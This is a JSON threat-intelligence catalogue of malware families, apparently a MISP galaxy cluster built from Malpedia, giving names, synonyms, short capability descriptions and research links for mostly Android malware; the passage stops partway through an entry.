{ "authors": [ "Davide Arcuri", "Alexandre Dulaunoy", "Steffen Enders", "Andrea Garavaglia", "Andras Iklody", "Daniel Plohmann", "Christophe Vandeplas", "Rmkml" ], "category": "tool", "description": "Malware galaxy cluster based on Malpedia.", "name": "Malpedia", "source": "Malpedia", "type": "malpedia", "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e", "values": [ { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/aix.fastcash", "https://www.us-cert.gov/ncas/alerts/TA18-275A", "https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/", "https://github.com/fboldewin/FastCashMalwareDissected/" ], "synonyms": [], "type": [] }, "uuid": "e8a04177-6a91-46a6-9f63-6a9fac4dfa02", "value": "FastCash" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.adultswine", "https://research.checkpoint.com/malware-displaying-porn-ads-discovered-in-game-apps-on-google-play/" ], "synonyms": [], "type": [] }, "uuid": "824f284b-b38b-4a57-9e4a-aee4061a5b2d", "value": "AdultSwine" }, { "description": "Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat", "https://github.com/DesignativeDave/androrat", "https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html", "https://www.kaspersky.com/blog/mobile-malware-part-4/24290/", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/" ], "synonyms": [], "type": [] }, "uuid": "80447111-8085-40a4-a052-420926091ac6", "value": "AndroRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubis", "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html", "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/", "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/", "http://blog.koodous.com/2017/05/bankbot-on-google-play.html", "https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html", "https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/", "https://pentest.blog/n-ways-to-unpack-mobile-malware/", "https://info.phishlabs.com/blog/new-variant-bankbot-banking-trojan-aubis", "https://www.fortinet.com/blog/threat-research/a-look-into-the-new-strain-of-bankbot.html", "https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html" ], "synonyms": [ "BankBot" ], "type": [] }, "uuid": "85975621-5126-40cb-8083-55cbfa75121b", "value": "Anubis" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubisspy", "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf", "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/" ], "synonyms": [], "type": [] }, "uuid": "06ffb614-33ca-4b04-bf3b-623e68754184", "value": "AnubisSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.asacub", "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/" ], "synonyms": [], "type": [] }, "uuid": "dffa06ec-e94f-4fd7-8578-2a98aace5473", "value": "Asacub" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut", "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/" ], "synonyms": [], "type": [] }, "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", "value": "Bahamut (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bianlian", "https://www.threatfabric.com/blogs/bianlian_from_rags_to_riches_the_malware_dropper_that_had_a_dream.html" ], "synonyms": [], "type": [] }, "uuid": "1faaa5c5-ab4e-4101-b2d9-0e12207d70fc", "value": "BianLian" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.busygasper", "https://securelist.com/busygasper-the-unfriendly-spy/87627/" ], "synonyms": [], "type": [] }, "uuid": "4bf68bf8-08e5-46f3-ade5-0bd4f124b168", "value": "BusyGasper" }, { "description": "Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim.\r\nThe distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered.\r\nCurrently the malware has overlays for over 2,200 apps of banks and financial institutions.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.catelites", "https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang", "https://www.youtube.com/watch?v=1LOy0ZyjEOk" ], "synonyms": [], "type": [] }, "uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6", "value": "Catelites" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chamois", "https://android-developers.googleblog.com/2017/03/detecting-and-eliminating-chamois-fraud.html", "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-unpacking-packed-unpacker-reversing-android-anti-analysis-native-library/" ], "synonyms": [], "type": [] }, "uuid": "2e230ff8-3971-4168-a966-176316cbdbf2", "value": "Chamois" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger", "http://blog.checkpoint.com/2017/01/24/charger-malware/", "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html", "https://www.welivesecurity.com/wp-content/uploads/2019/02/ESET_Android_Banking_Malware.pdf" ], "synonyms": [], "type": [] }, "uuid": "6e0545df-8df6-4990-971c-e96c4c60d561", "value": "Charger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor", "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf", "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", "https://media.ccc.de/v/33c3-7901-pegasus_internals", "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/", "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html" ], "synonyms": [ "JigglyPuff", "Pegasus" ], "type": [] }, "uuid": "52acea22-7d88-433c-99e6-8fef1657e3ad", "value": "Chrysaor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.clientor", "https://twitter.com/LukasStefanko/status/1042297855602503681" ], "synonyms": [], "type": [] }, "uuid": "c0a48ca3-682d-45bc-805c-e62aecd4c724", "value": "Clientor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.clipper", "https://lukasstefanko.com/2019/02/android-clipper-found-on-google-play.html", "https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/", "https://news.drweb.com/show?lng=en&i=12739" ], "synonyms": [], "type": [] }, "uuid": "ff9b47c6-a5b5-4531-abfc-2e4db3dcdc7e", "value": "Clipper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.comet_bot", "https://twitter.com/LukasStefanko/status/1102937833071935491" ], "synonyms": [], "type": [] }, "uuid": "151bf399-aa8f-4160-b9b5-8fe222f2a6b1", "value": "CometBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.connic", "https://www.welivesecurity.com/2017/12/11/banking-malware-targets-polish-banks/" ], "synonyms": [ "SpyBanker" ], "type": [] }, "uuid": "93b1c63a-4a34-44fd-805b-0a3470ff7e6a", "value": "Connic" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.cpuminer", "https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/" ], "synonyms": [], "type": [] }, "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", "value": "Cpuminer (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.doublelocker", "https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/" ], "synonyms": [], "type": [] }, "uuid": "10d0115a-00b4-414e-972b-8320a2bb873c", "value": "DoubleLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dualtoy", "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" ], "synonyms": [], "type": [] }, "uuid": "8269e779-db23-4c94-aafb-36ee94879417", "value": "DualToy (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dvmap", "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/" ], "synonyms": [], "type": [] }, "uuid": "e5de818e-d25d-47a8-ab31-55fc992bf91b", "value": "Dvmap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exobot", "https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/" ], "synonyms": [], "type": [] }, "uuid": "c9f2b058-6c22-462a-a20a-fca933a597dd", "value": "ExoBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exodus", "https://motherboard.vice.com/en_us/article/43z93g/hackers-hid-android-malware-in-google-play-store-exodus-esurv", "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", "https://motherboard.vice.com/en_us/article/eveeq4/prosecutors-investigation-esurv-exodus-malware-on-google-play-store" ], "synonyms": [], "type": [] }, "uuid": "462bc006-b7bd-4e10-afdb-52baf86121e8", "value": "Exodus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakespy", "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/", "https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users/" ], "synonyms": [], "type": [] }, "uuid": "dd821edd-901b-4a5e-b35f-35bb811964ab", "value": "FakeSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.faketgram", "https://blog.talosintelligence.com/2018/11/persian-stalker.html" ], "synonyms": [ "FakeTGram" ], "type": [] }, "uuid": "6c0fc7e4-4629-494f-b471-f7a8cc47c0e0", "value": "FakeGram" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexispy", "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" ], "synonyms": [], "type": [] }, "uuid": "4305d59a-0d07-4021-a902-e7996378898b", "value": "FlexiSpy (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexnet", "https://twitter.com/LukasStefanko/status/886849558143279104" ], "synonyms": [ "gugi" ], "type": [] }, "uuid": "80d7d229-b3a7-4205-8304-f7b18bda129f", "value": "FlexNet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghostctrl", "https://blog.trendmicro.com/trendlabs-security-intelligence/android-backdoor-ghostctrl-can-silently-record-your-audio-video-and-more/" ], "synonyms": [], "type": [] }, "uuid": "3b6c1771-6d20-4177-8be0-12116e254bf5", "value": "GhostCtrl" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove", "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773", "https://www.ci-project.org/blog/2017/3/4/arid-viper", "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/", "https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/", "https://www.clearskysec.com/glancelove/" ], "synonyms": [], "type": [] }, "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49", "value": "GlanceLove" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.goldenrat", "https://ti.360.net/blog/articles/apt-c-27-(goldmouse):-suspected-target-attack-against-the-middle-east-with-winrar-exploit-en/" ], "synonyms": [], "type": [] }, "uuid": "e111fff8-c73c-4069-b804-2d3732653481", "value": "GoldenRAT" }, { "description": "Cisco Talos identifies GPlayed as a malware written in .NET using the Xamarin environment for mobile applications. It is considered powerful because of its capability to adapt after its deployment. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gplayed", "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", "https://blog.talosintelligence.com/2018/10/gplayerbanker.html" ], "synonyms": [], "type": [] }, "uuid": "13dc1ec7-aba7-4553-b990-8323405a1d32", "value": "GPlayed" }, { "description": "Group-IB describes Gustuff as a mobile Android Trojan, which includes potential targets of customers in leading international banks, users of cryptocurrency services, popular ecommerce websites and marketplaces. Gustuff has previously never been reported. Gustuff is a new generation of malware complete with fully automated features designed to steal both fiat and crypto currency from user accounts en masse. The Trojan uses the Accessibility Service, intended to assist people with disabilities.\r\nThe analysis of Gustuff sample revealed that the Trojan is equipped with web fakes designed to potentially target users of Android apps of top international banks including Bank of America, Bank of Scotland, J.P.Morgan, Wells Fargo, Capital One, TD Bank, PNC Bank, and crypto services such as Bitcoin Wallet, BitPay, Cryptopay, Coinbase etc. Group-IB specialists discovered that Gustuff could potentially target users of more than 100 banking apps, including 27 in the US, 16 in Poland, 10 in Australia, 9 in Germany, and 8 in India and users of 32 cryptocurrency apps.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gustuff", "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", "https://www.group-ib.com/media/gustuff/" ], "synonyms": [], "type": [] }, "uuid": "a5e2b65f-2087-465d-bf14-4acf891d5d0f", "value": "Gustuff" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hero_rat", "https://www.welivesecurity.com/2018/06/18/new-telegram-abusing-android-rat/" ], "synonyms": [], "type": [] }, "uuid": "537f17ac-74e5-440b-8659-d4fdb4af41a6", "value": "HeroRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.irrat", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/" ], "synonyms": [], "type": [] }, "uuid": "3e7c6e8c-46fc-4498-a28d-5b3d144c51cf", "value": "IRRat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.jaderat", "https://blog.lookout.com/mobile-threat-jaderat" ], "synonyms": [], "type": [] }, "uuid": "8804e02c-a139-4c3d-8901-03302ca1faa0", "value": "JadeRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.kevdroid", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/", "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" ], "synonyms": [], "type": [] }, "uuid": "1e1924b5-89cb-408b-bcee-d6aaef7b24e0", "value": "KevDroid" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.koler", "https://twitter.com/LukasStefanko/status/928262059875213312" ], "synonyms": [], "type": [] }, "uuid": "4ff34778-de4b-4f48-9184-4975c8ccc3f3", "value": "Koler" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus", "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/" ], "synonyms": [], "type": [] }, "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", "value": "Lazarus (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus_elf", "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990" ], "synonyms": [], "type": [] }, "uuid": "fe6134aa-6588-4619-8447-57a44eb8b24c", "value": "Lazarus ELF Backdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.loki", "http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/" ], "synonyms": [], "type": [] }, "uuid": "a6f481fe-b6db-4507-bb3c-28f10d800e2f", "value": "Loki" }, { "description": "Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. Note, the network traffic is obfuscated the same way as in Android Bankbot.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot", "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html" ], "synonyms": [], "type": [] }, "uuid": "4793a29b-1191-4750-810e-9301a6576fc4", "value": "LokiBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.luckycat", "https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html" ], "synonyms": [], "type": [] }, "uuid": "1785a4dd-4044-4405-91c2-efb722801867", "value": "LuckyCat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.marcher", "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware", "https://www.clientsidedetection.com/marcher.html", "https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html" ], "synonyms": [ "ExoBot" ], "type": [] }, "uuid": "f691663a-b360-4c0d-a4ee-e9203139c38e", "value": "Marcher" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mazarbot", "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html", "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/" ], "synonyms": [], "type": [] }, "uuid": "38cbdc29-a5af-46ae-ab82-baf3f6999826", "value": "MazarBot" }, { "description": "MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mysterybot", "https://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html" ], "synonyms": [], "type": [] }, "uuid": "0a53ace4-98ae-442f-be64-b8e373948bde", "value": "MysteryBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.omnirat", "https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/", "https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co" ], "synonyms": [], "type": [] }, "uuid": "ec936d58-6607-4e33-aa97-0e587bbbdda5", "value": "OmniRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.podec", "https://securelist.com/jack-of-all-trades/83470/" ], "synonyms": [], "type": [] }, "uuid": "82f9c4c1-2619-4236-a701-776c6c781f45", "value": "Podec" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.popr-d30", "http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/", "http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/" ], "synonyms": [ "Popr-d30" ], "type": [] }, "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", "value": "X-Agent (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pornhub" ], "synonyms": [], "type": [] }, "uuid": "3272a8d8-8323-4e98-b6ce-cb40789a3616", "value": "Fake Pornhub" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.premier_rat", "https://twitter.com/LukasStefanko/status/1084774825619537925" ], "synonyms": [], "type": [] }, "uuid": "661471fe-2cb6-4b83-9deb-43225192a849", "value": "Premier RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.raxir", "https://twitter.com/PhysicalDrive0/statuses/798825019316916224" ], "synonyms": [], "type": [] }, "uuid": "f5cabe73-b5d6-4503-8350-30a6d54c32ef", "value": "Raxir" }, { "description": "RedAlert 2 is an new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server.\r\nThe malware also has the ability to block incoming calls from banks, to prevent the victim of being notified.\r\nAs a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores", "https://www.threatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html" ], "synonyms": [], "type": [] }, "uuid": "e9aaab46-abb1-4390-b37b-d0457d05b28f", "value": "RedAlert2" }, { "description": "The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.retefe", "http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html", "https://www.govcert.admin.ch/blog/33/the-retefe-saga", "http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html", "http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html", "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html", "http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/" ], "synonyms": [], "type": [] }, "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", "value": "Retefe (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.roaming_mantis", "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/", "https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/" ], "synonyms": [], "type": [] }, "uuid": "31d2ce1f-44bf-4738-a41d-ddb43466cd82", "value": "Roaming Mantis" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.rootnik", "https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer", "https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java" ], "synonyms": [], "type": [] }, "uuid": "db3dcfd1-79d2-4c91-898f-5f2463d7c417", "value": "Rootnik" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.sauron_locker", "https://twitter.com/LukasStefanko/status/1117795290155819008" ], "synonyms": [], "type": [] }, "uuid": "a7c058cf-d482-42cf-9ea7-d5554287ea65", "value": "Sauron Locker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.skygofree", "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", "https://cdn.securelist.com/files/2018/01/Skygofree_appendix_eng.pdf" ], "synonyms": [], "type": [] }, "uuid": "f5fded3c-8f45-471a-a372-d8be101e1b22", "value": "Skygofree" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slempo", "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html", "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html" ], "synonyms": [ "SlemBunk" ], "type": [] }, "uuid": "d87e2574-7b9c-4ea7-98eb-88f3e139f6ff", "value": "Slempo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slocker", "https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/" ], "synonyms": [], "type": [] }, "uuid": "fe187c8a-25d4-4d30-bd43-efca18d527f0", "value": "Slocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsspy" ], "synonyms": [], "type": [] }, "uuid": "7a38c552-0e1a-4980-8d62-1aa38617efab", "value": "SMSspy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spybanker", "https://news.drweb.com/show/?i=11104&lng=en", "http://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/" ], "synonyms": [], "type": [] }, "uuid": "e186384b-8001-4cdd-b170-1548deb8bf04", "value": "SpyBanker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr" ], "synonyms": [], "type": [] }, "uuid": "31592c69-d540-4617-8253-71ae0c45526c", "value": "SpyNote" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthagent", "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" ], "synonyms": [], "type": [] }, "uuid": "0777cb30-534f-44bb-a7af-906a422bd624", "value": "StealthAgent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthmango", "https://www.lookout.com/info/stealth-mango-report-ty" ], "synonyms": [], "type": [] }, "uuid": "7d480f11-3de8-463d-8a19-54685c8b9e0f", "value": "Stealth Mango" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.svpeng", "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/" ], "synonyms": [], "type": [] }, "uuid": "d99c0a47-9d61-4d92-86ec-86a87b060d76", "value": "Svpeng" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.switcher", "https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/" ], "synonyms": [], "type": [] }, "uuid": "e3e90666-bc19-4741-aca8-1e4cbc2f4c9e", "value": "Switcher" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.talent_rat", "https://twitter.com/LukasStefanko/status/1118066622512738304" ], "synonyms": [ "Assassin RAT" ], "type": [] }, "uuid": "46151a0d-aa0a-466c-9fff-c2c3474f572e", "value": "TalentRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.telerat", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/" ], "synonyms": [], "type": [] }, "uuid": "e1600d04-d2f7-4862-8bbc-0f038ea683ea", "value": "TeleRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tempting_cedar", "https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware" ], "synonyms": [], "type": [] }, "uuid": "982c3554-1df2-4062-8f32-f311940ad9ff", "value": "TemptingCedar Spyware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tinyz", "http://blog.group-ib.com/cron" ], "synonyms": [ "Catelites Android Bot", "MarsElite Android Bot" ], "type": [] }, "uuid": "93b27a50-f9b7-4ab6-bb9f-70a4b914eec3", "value": "TinyZ" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.titan", "https://blog.lookout.com/titan-mobile-threat", "https://www.alienvault.com/blogs/labs-research/delivery-keyboy" ], "synonyms": [], "type": [] }, "uuid": "7d418da3-d9d2-4005-8cc7-7677d1b11327", "value": "Titan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada", "https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/", "https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/", "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/", 